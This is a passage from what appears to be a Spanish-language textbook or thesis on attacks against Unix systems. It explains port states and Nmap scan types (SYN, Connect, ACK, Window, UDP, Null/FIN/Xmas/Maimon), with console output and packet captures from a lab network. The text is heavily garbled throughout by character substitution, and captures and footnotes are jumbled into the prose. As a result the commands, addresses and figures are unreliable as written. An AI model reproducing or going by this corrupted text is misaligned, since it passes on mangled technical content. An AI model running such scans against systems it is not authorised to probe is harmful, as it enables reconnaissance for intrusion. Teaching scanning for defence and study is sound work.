Ca")tulo 1. ( 1.2.Estados de un !uerto
Paquete Nro: 5 Tiempo: 0.07000) Origen: 19(.16).0.(:61609 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 61609 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: 6 Tiempo: 0.070331 Origen: 19(.16).0.30:)0 -> De tino: 19(.16).0.(:61609 Proto!o"o: T,P De !rip!i%n: )0 > 61609 -$.T4 #,50 .eq10 #!611 &in10 2en10

Ca"tura 2% !uerto FC! O. cerrado en el $ost *02.*JO...-.

En la Ca"tura 2 se "uede ver que luego de las "eticiones A<! ;*(1> ' el "aquete con el ,K@ enviado "or el "ort scanner al "uerto O. del $ost destino ;5># la respuesta que si)ue es un RATIA/J ;J>. Esto signi/ica que no $a' ningGn servicio es"erando "aquetes sobre el "uerto O. en el destino51# "or lo tanto# el puerto ,$ está cerrado. Co o se "uede a"reciar en todos estos casos# el "uerto origen que el "ort scanner elige ;J*J.0 en este caso> es irrelevante# co o ta bién el resto de la in/or aci8n FC! que viaja% @ro de secuencia ;,EV># @ro de Ac6# el ta aBo de la ventana FC! ;4in># el ta aBo largo del "a'load ;:en>.
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.00+7(0 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.0+1151 Origen: 19(.16).0.(:635() -> De tino: 19(.16).0.30:53 Proto!o"o: DN. De !rip!i%n: -3a"forme7 Pa!6et0 Paquete Nro: + Tiempo: 0.0+153+ Origen: 19(.16).0.30: -> De tino: 19(.16).0.(: Proto!o"o: 8,3P De !rip!i%n: De tination unrea!'ab"e 9Port unrea!'ab"e:

á9i o de seg ento ;M,,> ' el

Ca"tura -% !uerto 25! 5- Cerrado 51 Co o la ca"a FC! está a cargo del ,iste a ?"erativo# éste realiza la tarea de registrar qué "uerto está relacionado con qué "roceso# avisarle al is o cuando se abre una cone9i8n nueva# ' luego enviarle el "a'load de los "aquetes FC!. !or lo tanto# es ta bién el ,iste a ?"erativo que se encarga de la iniciaci8n ' /inalizaci8n de las cone9iones# no el "roceso. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -+ de 2*.

Ca")tulo 1. ( 1.2.Estados de un !uerto

En el caso de los "uertos 25! cerrados ;Ca"tura -># el

ensaje que se

recibe es un "aquete 7CM!# del ti"o - 55# que signi/ica C!uerto inalcanzableD. En este caso# el probe consiste en un env)o de un "aquete 25! al "uerto 5- destino ;usual ente utilizado "ara el servicio 5@,5J# $e aqu) el otivo>. El CMal/or ed !ac6etD que a"arece co o descri"ci8n del e9a en del scanner es "roducto de que el "aquete# si bien "arece "ertenecer al "rotocolo 5@,# no lo esH ni siquiera inclu'e un s8lo b'te corres"ondiente al "rotocolo 5@, co o carga del datagra a. =a' que recordar que los "ort scanners suelen no res"etar los "rotocolos ' "rocedi ientos estándar# tanto de ca"as in/eriores co o su"eriores# ' aqu) $a' una "rueba de ello.

1.2.-. !uerto Filtrado o Bloqueado ;CFilteredD>
2n "uerto se encuentra /iltrado cuando desde el objetivo no se recibe res"uestaH "uede causarse "orque un /ireIall# dis"ositivo inter edio ;router# sIitc$# etc.># o el equi"o destino is o esté interru "iendo el nor al /lujo de los "aquetesH o ta bién que la red esté saturada# o el "ort scanner es Ci "acienteD "ara una red en "articular ;lenta># ' deter ina que no recibi8 res"uesta# $abiéndose vencido un timer ;te "orizador>. Es $abilidad del "ort scanner anejar bien los tie "os# co o se verá a continuaci8n.

55 =a' que destacar que lo que se

uestra aqu) co o ca"tura de trá/ico es una inter"retaci8n de la

is a $ec$a con algunas $erra ientas de las cuales se dis"one# ocultando detalles "ara reducir la co "lejidad ' e9tensi8n innecesaria del docu ento. Es "or eso que aqu) no se a"recia el b'te .9.- dentro del encabezado 7CM! que indica esto. Ler el Ane9o B. 5J Ler Plosario% 5@,# "ág. *02. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -O de 2*.

Ca")tulo 1. ( 1.2.Estados de un !uerto
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000()3 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.0+059) Origen: 19(.16).0.(:37555 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 37555 > )0 -./N0 .eq10 2en10 3..11+60 Paquete Nro: + Tiempo: 0.15369) Origen: 19(.16).0.(:37556 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 37556 > )0 -./N0 .eq10 2en10 3..11+60

Ca"tura 1% Ca"tura de Frá/ico de un escaneo a un "uerto FC! bloqueado

En la Ca"tura 1 se ve que el 9ost destino nunca contesta los paquetes enviados por el scanner# que $ace 2 intentos in/ructuosos ;!aquetes - ' 1>. Aqu) se "uede co "render ejor "orqué es tan Gtil el buen anejo de los tie "os en is o en caso de que el otivo# "arte de la un so/tIare de escaneo de "uertos% la docu entaci8n del "rogra a utilizado en este caso5+ es"eci/ica que el A<! <equest lo $ace "or s) objetivo esté en la eta"a inicial lla ada is a red local Et$ernet ;de otra /or a lo $ace el ,iste a ost discover1DE# es obtener el <FF50 del objetivo "ara

?"erativo# que es el que natural ente se encarga de esto>. El

esti ar los valores de los te "orizadores internos ' as) saber que si el $ost no contesta# tener la certeza de devolver resultados correctos. ,i to a os este caso co o eje "lo# el <FF es de .#...2O- seg# que equivalen a .#2 es"erar `*.. s.J.H entonces# de acuerdo a dic$o valor# el "ort scanner decidi8 s. "ara volver a enviar el test. :uego se dedic8 a es"erar "or un

5+ ,e $izo uso de @ a" co o so/tIare de escaneo de "uertos# ' la docu entaci8n a la que se $ace re/erencia en este caso está dis"onible en% $tt"%&&n a".org& an& an($ost(discover'.$t l 5O ost discover1 N descubri iento de $ost. :os "rogra as "ara escanear "uertos de equi"os de red "ri ero intentan establecer si el dis"ositivo objetivo está conectado a la red# encendido# recibe ' env)a "aquetes ;o no># ' la a'or cantidad de in/or aci8n de la red que los conecta% cantidad de equi"os inter edios# si alteran el trá/ico# la de ora entre ellos ' ta bién al $ost /inal# etc. :uego $acen las "ruebas corres"ondientes. Ler S=5U@MA!T. 50 Ler Plosario% <FF# "ág. *01. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. -0 de 2*.

Ca")tulo 1. ( 1.2.Estados de un !uerto

resultado del objetivo un tie "o a"ro9i ado de 1..

s. ,abiendo el <FF# está

claro que el nivel de con=ian3a en el resultado D>el puerto está siendo =iltrado?E es mu! alto. El tie "o total del test dur8 unos ..5 segundos ;5.. ilisegundos>. ,i bien este eje "lo es sencillo "orque se "osee un valor de <FF bastante con/iable resultado de una "etici8n A<!# en el caso de los escaneos a objetivos /uera de una :A@ el "roble a de Csaber cuánto es"erarD se co "lica# 'a que $a' segura ente varios nodos inter edios# trá/ico de terceros# ' la "osibilidad de establecer un <FF Gnico ' constante es casi i "osible. 5i/erentes "ort scannersJ* to an di/erentes criterios "ara tratar de solucionarlo# ' todo buen $ac6er debe conocer estos detalles# 'a que un /also "ositivo o un negativo err8neo "uede di/icultar la tarea de obtenci8n de CgrietasD en la seguridad de la red a "enetrar. !or Glti o# $a' que resaltar que de"endiendo de las $erra ientas que se utilicen# en un escaneo de puertos UD4 s-lo se puede aseverar que un puerto UD4 está cerradoK es decir% si no está cerrado% puede estar a(ierto o =iltrado . En el caso de que no se reciba un "aquete 7CM! C5estination 2nreac$ableD# "ara deter inar que un "uerto 25! está abierto# $a' que saber de ante ano qué servicio está escuc$ando en dic$o "uerto ' C$ablarD su "rotocolo. Es cierto que $a' un juego de "robabilidades ;"or eje "lo# en el "uerto 5- es real ente raro que $a'a algo di/erente a un servidor 5@,> en donde se de/ina un conjunto de "uertos 25! co unes "ara $acer "ruebas# "ero aGn as)# esta ca"acidad de i "le entar "rotocolos de ca"as su"eriores a la 1 esca"a usual ente a los "ort scanners dada su co "lejidad. Aqu) reside otra raz8n "or la cual los escaneos FC! son general ente ás tenidos en cuenta.

1.-. Fi"os de !ort ,canning en @Ma"
As) co o $a' Glti"les estados de un "uerto# $a' Glti"les aneras de enviar probes. En este caso# el so/tIare de escaneo CtuerceD el "rotocolo FC! a su
J. Este tie "o ;`.#...2 segundos a `.#2 ilisegundos> es e9tre ada ente bajoH la raz8n reside áquinas virtuales# no con una red /)sica de "or s.# "ero "uede variar uc$o. Ler Ane9o B. en que el á bito de "ruebas se realiz8 con

edio. :os tie "os de retardo entre $osts en una red et$ernet t)"ica ;de algunas "ocas áquinas> "uede establecerse en alrededor de * J* !ort Bunn' es un so/tIare de escaneo que se "reocu"a e9clusiva ente "or tener un buen esque a de timing# ' as) o"ti izar tie "os de tests de "uertos /iltrados# utilizando técnicas bastante novedosas. Ler $tt"%&&III.recurit'(labs.co &"ortbunn'&"ortbunn'.$t l Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 1. de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

/avor ' utiliza di/erentes co binaciones no estándar de /lags FC! "ara averiguar la a'or cantidad de in/or aci8n de los "uertos destino en "articular ' de la red :a enu eraci8n que sigue $ace re/erencia a las técnicas de escaneo dis"onibles en el "aquete de so/tIare Nmap. Aunque "robable ente sea el "ort scanner ás utilizado# dis"oniendo de una variedad de ti"os de scanning que no se uestra algunas desventajas que encuentra /ácil ente en otro scanner# ta bién "osterior ente. objetivo en general.

"ueden ser cubiertas "or otros "rogra as o técnicas que se describirán

1.-.*. ,'n ,can
El ,'n ,can es el ti"o de scanning FC! obtener de ás utilizado# 'a que "er ite anera rá"ida ' bastante CsilenciosaD una idea del estado de los

"uertos FC! en el destino. Consiste en enviar un "aquete de inicio de cone9i8n FC! ;con el /lag ,K@ activado># a es"era de una res"uesta del destino. ,i la res"uesta es un "aquete ,K@_ACR# el "uerto está abierto. ,i la res"uesta es un <,F o <,F_ACR# el "uerto está cerrado. ,i no $a' res"uesta o se recibe un 7CM! 2nreac$able# @ a" identi/ica el "uerto co o /iltrado ;si es el "ri er caso# se dice que los "aquetes que env)a el "ort scanner son Cdro"eadosDBA>.
marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - . -p (( 19(.16).0.30

.tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-0(-(3 1+:50 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p open ' 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.3)1 e!on7

Consola *% ,alida t)"ica de un ,'n ,can "or @ a"

En la Consola @ro.* se "uede ver un escaneo $ec$o "or @ a" ' el resultado corres"ondiente% el "uerto 22 está abierto. @ a" en este caso CadivinaD que el servicio que está detrás es un ,ecure ,$ell J-# "ero no $ace una indagaci8n real al res"ectoH s8lo indica que el "uerto 22# de acuerdo a una tabla de servicios&nG ero de "uerto# es nor al ente utilizado "or ,,= ; ás adelante se verá c8 o @ a"
J2 En la jerga# Cdro"earD un "aquete es CtirarloD# o CignorarloD. Es una castellanizaci8n del verbo drop# que en inglés signi/ica CtirarD. J- Ler Plosario% ,,=# "ág. *01. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 1* de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

"er ite $acer detecci8n de servicios>. El co ando C u7o .;nmap - . -p (( 19(.16).0.30 C ta bién /ue el que gener8 la Ca"tura *H sin e bargo las ca"turas 2 ' 1 ta bién son de ti"o ,'n# aunque los resultados /ueron di/erentes% la colu na S-4-3 ;CEstadoD> /ue re"ortada co o closed ;CCerradoD> ' filtered ;CFiltradoD> res"ectiva ente# ade ás de ir dirigidos a "uertos di/erentes. En el siguiente a"artado se detallarán las o"ciones de @ a"# junto con las caracter)sticas avanzadas. Es i "ortante destacar que este ti"o de escaneo requiere de "er isos de root o ad inistrador del ,iste a ?"erativo# 'a que accede a la A!7J1 de ,oc6ets <aIJ5# ' el acceso a ésta es una de las ca"acidades e9clusivas de rootJJ.

1.-.2. Connect ,can
El CConnect ,canD es el ti"o de escaneo es el ás antiguo# ' "odr)a decirse que enos original. ,i "le ente trata de establecer una cone9i8n FC! de tres

v)as en /or a co "leta ;,'n → ,'n_Ac6 b Ac6>H si el "uerto se encuentra abierto# luego de establecerse la cone9i8n# el scanner la cierra. ,i el "uerto estaba cerrado o /iltrado# los resultados son iguales al ,'n ,can. :a "rinci"al ventaja que tiene es que no son necesarios los "er isos de root# s8lo $a' que ser usuario del siste a# 'a que en este caso se res"eta el "rotocolo FC!J+ ' se $ace uso de la is a A!7JO ;B,5 ,oc6ets> que el resto de los ás "rogra as de red ;navegadores Ieb# clientes de correo# etc.>. :a desventaja es que estos intentos de escaneo son sensible ente servicio que está escuc$ando en el "uerto destino# el visibles en la red que el ,'n ,can# 'a que al establecerse la cone9i8n con el is o recibe el evento de ás /ácil ente cone9i8n# "udiendo asentarlo en su arc$ivo de logs ' ser auditado
J1 Ler Plosario% A!7# "ág. *02. J5 Ler Plosario% ,oc6ets <aI# "ág. *01. JJ !ara ver un listado ' ás detalle de las Ca"acidades ;&apabilites> de root en :inu9% $tt"%&&III.esdebian.org&static"ages&inde9."$"Y"agea2..1.+*5.2--1+O2+ $tt"%&&III.ib .co &develo"erIor6s&librar'&l("osi9ca".$t l $tt"%&&III.securit'/ocus.co &in/ocus&*1.. J+ El inicio de sesi8n FC! se es"eci/ica en el <FC+0-# secci8n -.1. 2<:%$tt"%&&tools.iet/.org&$t l&r/c+0-csection(-.1 JO :a A!7 que utilizan la a'or)a de los "rogra as "ara acceder a las /unciones FC!&25! del ,iste a ?"erativo se lla a B,5 ,oc6ets. Ler $tt"%&&en.Ii6i"edia.org&Ii6i&B,5Usoc6ets Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 12 de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

"or un ad inistrador o "ersonal de seguridad. ?tra contra es que es nota banda># 'a que "or cada "uerto a "robar# se env)an al

ás lento ;se ás que

ás si la red está saturada# su/re de retardo o el enlace tiene "oco anc$o de enos 2 "aquetes

con el ,'n ,can ;Ac6 del ?rigen en vez del <st _ el Banner del ,ervicio del destino _ el <,F del ?rigen># sin tener en cuenta justa ente# retrans isiones o de oras.
marcelo@saturno:~/src/nmap/bin$ .;nmap -P0 -p (( 19(.16).0.30 .tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-0(-(3 17:(3 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p open ' Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.119 e!on7

Consola 2% Eje "lo de Connect ,can con @Ma"

En la Consola 2 queda evidenciado que salvo "or la no utilizaci8n del co ando de 2ni9 CsudoDJ0 ' "or la /alta de "ará etros es"eci/icando el ti"o de escaneo+.# "edirle a @ a" que $aga un Connect ,can es A continuaci8n se escaneo de "uertos.
Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.0007)0 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.000795 Origen: 19(.16).0.(:57)59 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -./N0 .eq10 2en10 3..11+60 T.=1)376003 T.<$10 &.17 Paquete Nro: + Tiempo: 0.0009)5

u' sencillo. ientras se ejecutaba el

uestra una ca"tura de trá/ico

J0 ,udo es un "rogra a que "er ite dar acceso a un usuario o un gru"o 2ni9 "er isos "ara ejecutar un co ando co o usuario root. 2<:% $tt"%&&III.sudo.Is& +. El Connect ,can es el que @ a" ejecuta "or de/ecto "ara los usuarios no root. AGn co o usuario root# el "ará etro (sF "er ite /orzar este ti"o de scanning. Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 1- de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"
Origen: 19(.16).0.30:(( -> De tino: 19(.16).0.(:57)59 Proto!o"o: T,P De !rip!i%n: (( > 57)59 -./N4 #,50 .eq10 #!611 &in1131070 2en10 3..11+60 &.11 T.=1(13))76) T.<$1)376003 Paquete Nro: 5 Tiempo: 0.00101+ Origen: 19(.16).0.(:57)59 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -#,50 .eq11 #!611 &in15))) 2en10 T.=1)37600+ T.<$1(13))76) Paquete Nro: 6 Tiempo: 0.039)61 Origen: 19(.16).0.30:(( -> De tino: 19(.16).0.(:57)59 Proto!o"o: ..? De !rip!i%n: .er@er Proto!o": ..?-(.0-Open..?A+.5p1 BreeC.D-(0061110 Paquete Nro: 7 Tiempo: 0.039)99 Origen: 19(.16).0.(:57)59 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -#,50 .eq11 #!61+0 &in15))) 2en10 T.=1)37601+ T.<$1(13)))75 Paquete Nro: ) Tiempo: 0.057+67 Origen: 19(.16).0.(:57)59 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 57)59 > (( -$.T4 #,50 .eq11 #!61+0 &in15))) 2en10 T.=1)376019 T.<$1(13)))75

Ca"tura 5% Ca"tura de Frá/ico de un Connect ,can

En los "aquetes - a 5 de la ca"tura se ve c8 o se establece el - ree'%a1 Hands ake FC! entre origen ' destino ;no olvidar que el "uerto 22 en *02.*JO...-. está abierto>. :uego ;J># interviene en Cla c$arlaD el de onio ,,= del $ost destino# enviando su banner+) tal co o lo es"eci/ica su "rotocolo +2. !or Glti o# @ a" env)a un ACR ;+> del "aquete J# ' luego cierra la cone9i8n con un <st_Ac6 en el "aquete @ro.O ;no es la /or a estándar de $acerlo# sino que es una /or a de =or3ar el cierre de la sesi8n FC!>.

1.-.-. Ac6 ,can
El ACR ,can $ace que el objetivo env)e co o res"uesta un "aquete con el /lag <,F "or cada "uerto# inde"endiente ente de que esté abierto o cerrado. ,i no
+* 5anner ;CFitularD>. Es una "ráctica co Gn de la de CanuncioD al cliente que se conecta. Este a'or)a de los "rotocolos enviar un ensaje a'or

ensaje se lla a 5anner en la jerga.

+2 El "rotocolo ,,= versi8n 2 es un estándar abierto ' está detallado en varios <FCs. :a 2<:s% $tt"%&&tools.iet/.org&$t l&r/c125*# $tt"%&&III.o"enss$.co & anual.$t l

"arte de su arquitectura ' co "onentes se es"eci/ican en los <FC 125. al 125J.

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 11 de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

$a' res"uesta o se recibe un 7CM! Cdestination unreac$ableD# se debe

u'

"robable ente a que un /ireIall o dis"ositivo de /iltrado de "aquetes esté i "idiendo que los probes de este escaneo lleguen a destino. Justa ente éste es el objetivo de esta "rueba. Este ti"o de scanning permite dar una idea al atacante so(re qué puertos están siendo =iltrados ' a qué "uertos del objetivo es "er itido acceder% su salida es C/ilteredD o Cun/ilteredD.
marcelo@saturno:~/src/nmap/bin$ u7o .;nmap - # -p ((4)0 19(.16).0.30

.tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-03-0( 16:+5 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< ((;t!p unfi"tere7 ' )0;t!p unfi"tere7 'ttp 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.3+6 e!on7

Consola -% Eje "lo * de Escaneo ACR ( !uertos @o Filtrados

Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000(69 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.031)9) Origen: 19(.16).0.(:3++90 -> De tino: 19(.16).0.30:(( Proto!o"o: T,P De !rip!i%n: 3++90 > (( -#,50 .eq10 #!610 &in110(+ 2en10 Paquete Nro: + Tiempo: 0.03(16( Origen: 19(.16).0.30:(( -> De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: (( > 3++90 -$.T0 .eq10 2en10 Paquete Nro: 5 Tiempo: 0.03(3(1 Origen: 19(.16).0.(:3++90 -> De tino: 19(.16).0.30:)0 Proto!o"o: T,P De !rip!i%n: 3++90 > )0 -#,50 .eq10 #!610 &in1(0+) 2en10

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 15 de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

Paquete Nro: 6 Tiempo: 0.03(396 Origen: 19(.16).0.30:)0 -> De tino: 19(.16).0.(:3++90 Proto!o"o: T,P De !rip!i%n: )0 > 3++90 -$.T0 .eq10 2en10

Ca"tura J% Eje "lo de Ac6 ,can con !uertos @o Filtrados

En a bos cuadros

ostrados "revia ente ;la Consola @ro. - gener8 la

Ca"tura @ro. J># se "uede ver que aGn cuando el "uerto 22 está abierto ' el O. está cerrado# el objetivo del test es otro% el resultado del "aquete con /lag ACR es un <,F# ' @ a" en la salida dice que a bos "uertos están sin /iltrar. El caso o"uesto ocurre en el eje "lo siguiente%
marcelo@saturno:~/src/nmap/bin$ - u7o0 pa >or7 for mar!e"o: u7o .;nmap - # -p )0)0 19(.16).0.30

.tarting Nmap +.50 9 'ttp:;;in e!ure.org : at (00)-03-0( 17:10 #$.T 8ntere ting port on !i!"on 919(.16).0.30:: PO$T .T#T< .<$=8,< )0)0;t!p fi"tere7 'ttp-proDE 3#, #77re : 00:0,:(9:<1:#(:(6 9=3>are: Nmap 7one: 1 8P a77re 91 'o t up: marcelo@saturno:~/src/nmap/bin$ !anne7 in 0.6)1 e!on7

Consola 1% @Ma"

ostrando un "uerto /iltrado co o resultado de un ACR ,can

Paquete Nro: 1 Tiempo: 0.000000 Origen: 00:17:31:96:5b:1f: -> De tino: ff:ff:ff:ff:ff:ff: Proto!o"o: #$P De !rip!i%n: &'o 'a 19(.16).0.30* Te"" 19(.16).0.( Paquete Nro: ( Tiempo: 0.000697 Origen: 00:0!:(9:e1:a(:(6: -> De tino: 00:17:31:96:5b:1f: Proto!o"o: #$P De !rip!i%n: 19(.16).0.30 i at 00:0!:(9:e1:a(:(6 Paquete Nro: 3 Tiempo: 0.036039 Origen: 19(.16).0.(:35)37 -> De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)37 > )0)0 -#,50 .eq10 #!610 &in1+096 2en10 Paquete Nro: + Tiempo: 0.1+(6(7 Origen: 19(.16).0.(:35)3) -> De tino: 19(.16).0.30:)0)0 Proto!o"o: T,P De !rip!i%n: 35)3) > )0)0 -#,50 .eq10 #!610 &in110(+ 2en10

Ca"tura +% Ca"tura que

uestra la no res"uesta del objetivo al ACR ,can

En este caso# se "uede observar que el objetivo no res"onde al ACR ,can# "or lo tanto él o algGn dis"ositivo inter edio está /iltrando los "aquetes enviados.
Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 1J de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

1.-.1. 4indoI ,can
El 4indoI ,can es si ilar al anterior# con la di/erencia de que el "ort scanner# luego de enviar el "aquete con el ACR# intenta $acer una su"osici8n del estado del "uerto de acuerdo a di/erencias conocidas en el ta aBo de ventana FC! del "aquete <,F que obtiene co o res"uesta ;si se recibe un <,F ' el ta aBo de ventana es .# es "robable que el "uerto esté cerrado# si el ta aBo de ventana es un nG ero "ositivo# es "robable que esté abierto>. Este ti"o de escaneo de"ende e9clusiva ente de la i "le entaci8n del stac6 FC! del ,iste a ?"erativo destino# "or lo que no es mu! con=ia(leH aGn as)# general ente es cuesti8n de correrlo ' ver si los resultados revelan alguna in/or aci8n interesante. !or eje "lo# si "ara los "uertos co unes ;22# 25# O.> se obtiene un Cun/ilteredD# es "robable que e/ectiva ente# dic$os "uertos estén abiertosH en algunos casos sucede a la inversa# etc.+-

1.-.5. 25! ,can
El escaneo 25! se encarga de veri/icar el estado de los "uertos 25! del destino. :a di/icultad Ce9traD ;teniendo en cuenta la obtenci8n de resultados Gtiles> que "lantea el "rotocolo 25! es su /alta de estado# 'a que está orientado a datagra as+1# sin la co "lejidad del esque a basado en cone9iones de FC!. ?tra desventaja es que al no tener di/erentes estos Cestados de cone9i8nD ;'a que co o se dijo# no $a' cone9iones># el test que $ace el "ort scanner es directa ente enviado a la a"licaci8n "or el ,iste a ?"erativo ;si el "uerto está abierto># lo que $ace al test evidente ente de ti"o FC!. 5ebido a lo anterior# @ a" "roduce usual ente dos resultados% "uerto cerrado o Co"end/ilteredD ;abierto o /iltrado>. El "ri ero corres"onde a que se recibi8 un "aquete 7CM! de ti"o C5estination 2nreac$able&!ort 2nreac$ableD ;7CM! ti"o -# c8digo ->H el segundo a que no se recibi8 res"uesta# cosa que
+- AGn as)# a "esar de $aberse realizado varias "ruebas con di/erentes ,?s actuales ' no tanto# no se $a "odido obtener di/erencia substancial alguna con res"ecto al ACR ,can% todos los ta aBos de ventana de los <,F ;de "uertos abiertos ' cerrados> son .. Es "or eso que este escaneo no es tan /recuente# ' "uede que tenga co o 25! o is o 7!. a'or valor en arquitecturas o redes Clegac1D. +1 En general# se considera co o datagra a un "aquete corres"ondiente a un servicio no /iable#

ás detectable "ara el objetivo que algunos escaneos

Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 1+ de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

sucede con la

a'or)a de los servicios que utilizan 25!# 'a que @ a" env)a un

probe 25! "ero vac6o+5#+J. Ade ás estos resultados# en ocasiones "uede recibirse un 7CM! ti"o ;5estination 2nreac$able># "ero c8digo *# 2# 0# *. o *-# en cu'os casos# @ a" in/or a que el "uerto está /iltrado ;sola ente>. Esto es as) "orque justa ente estos "aquetes 7CM! re"ortan un "roble a con el destino o una "ro$ibici8n a nivel ad inistrativo. !or Glti o# si algGn servicio que está escuc$ando en el "uerto 25! que está siendo escaneado# retorna alguna res"uesta al Cest) uloD del datagra a vac6o enviado "or @ a"# éste lo arca co o a(ierto. Estos dos Glti os casos no son tan co unes# 'a que en las redes de $o' en d)a estos "aquetes 7CM! no son utilizados "or routers&/ireIalls ;los datagra as si "le ente se Cdro"eanD># o "or otra "arte no $a' res"ondan a un ensaje vac)o# res"ectiva ente. uc$os servicios que

1.-.J. Mai on# @ull# Fin ' A as ,can
Estos ti"os de scanning tienen un objetivo co Gn% de=inir qué puertos se encuentran cerrados# enviando di/erentes co binaciones de /lags# segGn el ti"o de scan%
● ● ● ●

Null% @ingGn Flag activado. 2in% F7@ sola ente. Cmas++% F7@ _ !,= _ 2<P. 1aimon% F7@ _ ACR. :a idea de esta co binaci8n de banderas FC! es obtener "rovec$o de un

"ar de detalles de la es"eci/icaci8n de las <FC +0- S<FCU+0-T# que establece que%

Cuando el estado de un "uerto es Cerrado# cualquier seg ento de entrada es res"ondido con un <,F co o res"uesta. ,i el estado es :isten ;Abierto># cualquier otro seg ento que no contenga un ,K@# <,F o un ACR# el $ost debe Cdro"earD el "aquete ;aGn cuando

+5 Ler Ca"tura -# "ág. -+. +J @ a" ta bién dis"one de $erra ientas "ara $acer /inger"rint de servicios ' ,?s. Ler "ág. 02. ++ ,e lo lla a A as "or abreviaci8n del inglés c ristmas ;CnavidadD># "orque la re"resentaci8n del b'te de los /lags activados en el $eader FC! es si ilar a las luces de un árbol de navidad ;cIr# ecn# 2<P# ac6# !,=# rst# s'n# F7@ a ..*.*..* a .920> Fécnicas co unes de Ataque a equi"os con siste a o"erativo 2ni9 o derivados ( !ág. 1O de 2*.

Ca")tulo 1. ( 1.-.Fi"os de !ort ,canning en @Ma"

